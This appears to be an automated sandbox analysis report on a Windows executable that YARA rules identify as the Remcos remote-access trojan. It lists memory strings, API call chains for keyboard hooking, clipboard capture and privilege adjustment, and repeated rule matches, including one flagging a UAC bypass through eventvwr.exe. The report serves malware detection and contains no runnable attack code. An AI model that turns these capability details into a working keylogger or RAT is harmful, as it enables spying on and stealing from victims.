            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp, ZRuVeAoBoxootS.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp8
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpB
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1601575428.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 0000000A.00000002.1677124907.00000000029C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000016_2_00409340
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,16_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,16_2_00414EC1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,16_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,16_2_00409468

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Contains functionalty to change the wallpaper
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A76C SystemParametersInfoW,16_2_0041A76C

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,16_2_00414DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_02E1DEEC0_2_02E1DEEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E6EF80_2_071E6EF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E6EE80_2_071E6EE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E4D480_2_071E4D48
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E44D80_2_071E44D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E49100_2_071E4910
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071ED1080_2_071ED108
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E51800_2_071E5180
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_028FDEEC10_2_028FDEEC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_04F0004010_2_04F00040
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_04F0000610_2_04F00006
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_07156EF810_2_07156EF8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_07156EE810_2_07156EE8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_071544D810_2_071544D8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_0715491010_2_07154910
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_0715518010_2_07155180
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_0715C04810_2_0715C048
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0042515216_2_00425152
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043528616_2_00435286
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004513D416_2_004513D4
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0045050B16_2_0045050B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043651016_2_00436510
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004316FB16_2_004316FB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043569E16_2_0043569E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0044370016_2_00443700
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004257FB16_2_004257FB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004128E316_2_004128E3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0042596416_2_00425964
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041B91716_2_0041B917
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043D9CC16_2_0043D9CC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00435AD316_2_00435AD3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00424BC316_2_00424BC3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043DBFB16_2_0043DBFB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0044ABA916_2_0044ABA9
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00433C0B16_2_00433C0B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00434D8A16_2_00434D8A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0043DE2A16_2_0043DE2A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041CEAF16_2_0041CEAF
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00435F0816_2_00435F08
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: String function: 00402073 appears 51 times
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: String function: 00432B90 appears 53 times
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: String function: 00432525 appears 41 times
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1611259289.00000000081E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1599809753.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1599809753.00000000011D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameH; vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeBinary or memory string: OriginalFilenamewGsy.exe> vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ZRuVeAoBoxootS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, EfxCjuFBDrNuN7uJX7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, EfxCjuFBDrNuN7uJX7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@21/16@2/3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_00415C90
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,16_2_0040E2E7
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,16_2_00419493
